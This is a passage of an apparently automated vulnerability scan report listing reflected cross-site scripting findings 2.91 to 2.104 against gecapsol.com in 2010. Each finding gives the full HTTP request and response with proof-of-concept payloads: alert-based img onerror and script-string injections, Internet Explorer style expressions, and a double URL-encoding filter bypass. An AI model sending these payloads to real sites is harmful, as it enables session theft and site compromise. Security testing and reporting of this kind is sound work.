2.91. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/careers/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/careers/index.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d3d8"><img%20src%3da%20onerror%3dalert(1)>c0d3b78b1ee was submitted in the REST URL parameter 6. This input was echoed as 6d3d8"><img src=a onerror=alert(1)>c0d3b78b1ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d3d8"><img%20src%3da%20onerror%3dalert(1)>c0d3b78b1ee/careers/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:43 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en6d3d8"><img src=a onerror=alert(1)>c0d3b78b1ee; Expires=Fri, 25-Nov-2011 03:03:43 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:44 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 20082
Connection: close


<!-- try /careers -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equ
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d3d8"><img src=a onerror=alert(1)>c0d3b78b1ee/careers/index.html">
...[SNIP]...

2.92. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/careers/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/careers/index.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e287a"-alert(1)-"649b713b118 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ene287a"-alert(1)-"649b713b118/careers/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:59 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=ene287a"-alert(1)-"649b713b118; Expires=Fri, 25-Nov-2011 03:03:50 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:59 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 19056
Connection: close


<!-- try /careers -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-equ
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/ene287a"-alert(1)-"649b713b118/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.93. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/industries [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/industries

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6e86"><img%20src%3da%20onerror%3dalert(1)>c337dd7d8e3 was submitted in the REST URL parameter 6. This input was echoed as e6e86"><img src=a onerror=alert(1)>c337dd7d8e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ene6e86"><img%20src%3da%20onerror%3dalert(1)>c337dd7d8e3/industries HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:34 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=ene6e86"><img src=a onerror=alert(1)>c337dd7d8e3; Expires=Fri, 25-Nov-2011 03:03:33 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:34 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 26491
Connection: close


<!-- try /industries -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-eq
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/ene6e86"><img src=a onerror=alert(1)>c337dd7d8e3/industries/index.html">
...[SNIP]...

2.94. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/industries [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/industries

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0593"-alert(1)-"d78e5639b46 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/ene0593"-alert(1)-"d78e5639b46/industries HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:40 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=ene0593"-alert(1)-"d78e5639b46; Expires=Fri, 25-Nov-2011 03:03:37 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:40 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 24961
Connection: close


<!-- try /industries -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta http-eq
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/ene0593"-alert(1)-"d78e5639b46/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.95. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/index.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b90"-alert(1)-"ced45cc14f9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en10b90"-alert(1)-"ced45cc14f9/technology_finance/tech_pages/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:03 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en10b90"-alert(1)-"ced45cc14f9; Expires=Fri, 25-Nov-2011 03:03:02 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 13440
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en10b90"-alert(1)-"ced45cc14f9/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.96. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/index.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/index.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 910e0%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e8e851e91124 was submitted in the REST URL parameter 6. This input was echoed as 910e0"><x style=x:expression(alert(1))>8e851e91124 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en910e0%2522%253e%253cx%2520style%253dx%253aexpression%2528alert%25281%2529%2529%253e8e851e91124/technology_finance/tech_pages/index.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:02:52 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en910e0"><x style=x:expression(alert(1))>8e851e91124; Expires=Fri, 25-Nov-2011 03:02:46 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:02:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14232
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en910e0"><x style=x:expression(alert(1))>8e851e91124/technology_finance/tech_pages/index.html">
...[SNIP]...

2.97. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d64c"><x%20style%3dx%3aexpression(alert(1))>1019ecc4962 was submitted in the REST URL parameter 6. This input was echoed as 6d64c"><x style=x:expression(alert(1))>1019ecc4962 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d64c"><x%20style%3dx%3aexpression(alert(1))>1019ecc4962/technology_finance/tech_pages/techadvise.html HTTP/1.1
Host: gecapsol.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:02:52 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en6d64c"><x style=x:expression(alert(1))>1019ecc4962; Expires=Fri, 25-Nov-2011 03:02:50 GMT; Path=/cms/
Set-Cookie: JSESSIONID=254284AC86CF2226438466141033CC1A; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:02:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14184


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d64c"><x style=x:expression(alert(1))>1019ecc4962/technology_finance/tech_pages/techadvise.html">
...[SNIP]...

2.98. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46bb7%2522%252dalert%25281%2529%252d%2522fe1fe929661 was submitted in the REST URL parameter 6. This input was echoed as 46bb7"-alert(1)-"fe1fe929661 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en46bb7%2522%252dalert%25281%2529%252d%2522fe1fe929661/technology_finance/tech_pages/techadvise.html HTTP/1.1
Host: gecapsol.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:03 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en46bb7"-alert(1)-"fe1fe929661; Expires=Fri, 25-Nov-2011 03:03:00 GMT; Path=/cms/
Set-Cookie: JSESSIONID=00BDC6206CE18904C051A34EC57AB9C0; Path=/cms
Last-Modified: Thu, 25 Nov 2010 03:03:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 13414


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en46bb7"-alert(1)-"fe1fe929661/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.99. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techadvise.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d750%2522%253e%253ca%253eac006d1ba9c was submitted in the REST URL parameter 6. This input was echoed as 6d750"><a>ac006d1ba9c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d750%2522%253e%253ca%253eac006d1ba9c/technology_finance/tech_pages/techadvise.html?print=yes HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:02:42 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en6d750"><a>ac006d1ba9c; Expires=Fri, 25-Nov-2011 03:02:36 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:02:42 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 13169
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en6d750"><a>ac006d1ba9c/technology_finance/tech_pages/techadvise.html">
...[SNIP]...

2.100. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techfinance.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techfinance.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 889d0"-alert(1)-"3fbdcdf0013 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/en889d0"-alert(1)-"3fbdcdf0013/technology_finance/tech_pages/techfinance.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:15 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=en889d0"-alert(1)-"3fbdcdf0013; Expires=Fri, 25-Nov-2011 03:03:07 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:15 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 13388
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/en889d0"-alert(1)-"3fbdcdf0013/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.101. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techfinance.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techfinance.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8375"><img%20src%3da%20onerror%3dalert(1)>71421c64c10 was submitted in the REST URL parameter 6. This input was echoed as d8375"><img src=a onerror=alert(1)>71421c64c10 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/end8375"><img%20src%3da%20onerror%3dalert(1)>71421c64c10/technology_finance/tech_pages/techfinance.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:03 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=end8375"><img src=a onerror=alert(1)>71421c64c10; Expires=Fri, 25-Nov-2011 03:02:57 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:03 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14018
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/end8375"><img src=a onerror=alert(1)>71421c64c10/technology_finance/tech_pages/techfinance.html">
...[SNIP]...

2.102. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techmanage.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techmanage.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33a9"><a%20b%3dc>e982d595b37 was submitted in the REST URL parameter 6. This input was echoed as b33a9"><a b=c>e982d595b37 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/b33a9"><a%20b%3dc>e982d595b37/technology_finance/tech_pages/techmanage.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:01 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=b33a9"><a b=c>e982d595b37; Expires=Fri, 25-Nov-2011 03:02:53 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:01 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14186
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<base href="http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/b33a9"><a b=c>e982d595b37/technology_finance/tech_pages/techmanage.html">
...[SNIP]...

2.103. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techmanage.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techmanage.html

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42780"-alert(1)-"5fd0a1808a6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cms/servlet/cmsview/GE_Capital_Solutions/prod/42780"-alert(1)-"5fd0a1808a6/technology_finance/tech_pages/techmanage.html HTTP/1.1
Host: gecapsol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=2E136C2D927D1A6F0C9FC8046C5D8C6A; cms_preferred_language=en;

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 25 Nov 2010 03:03:16 GMT
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-4.0.0 (build: CVSTag=JBoss_4_0_0 date=200409200418)
Set-Cookie: cms_preferred_language=42780"-alert(1)-"5fd0a1808a6; Expires=Fri, 25-Nov-2011 03:03:09 GMT; Path=/cms/
Last-Modified: Thu, 25 Nov 2010 03:03:16 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 14291
Connection: close


<!-- try /technology_finance/tech_pages -->
<!-- try /technology_finance -->
<!-- found section -->

<!DOCTYPE html PUBLIC "-//W3C//DTD
...[SNIP]...
<link REL='stylesheet' HREF='http://gecapsol.com:80/cms/servlet/cmsview/GE_Capital_Solutions/prod/42780"-alert(1)-"5fd0a1808a6/shared/css/GereSite_nn.css' TYPE='text/css'>
...[SNIP]...

2.104. http://gecapsol.com/cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techrecovery.html [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gecapsol.com
Path:   /cms/servlet/cmsview/GE_Capital_Solutions/prod/en/technology_finance/tech_pages/techrecovery.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 725e6"style%3d"x%3aexpression(alert(1))"c7800b57464 was submitted in the REST URL parameter 6. This input was echoed as 725e6"style="x:expression(alert(1))"c7800b57464 in the application's response.

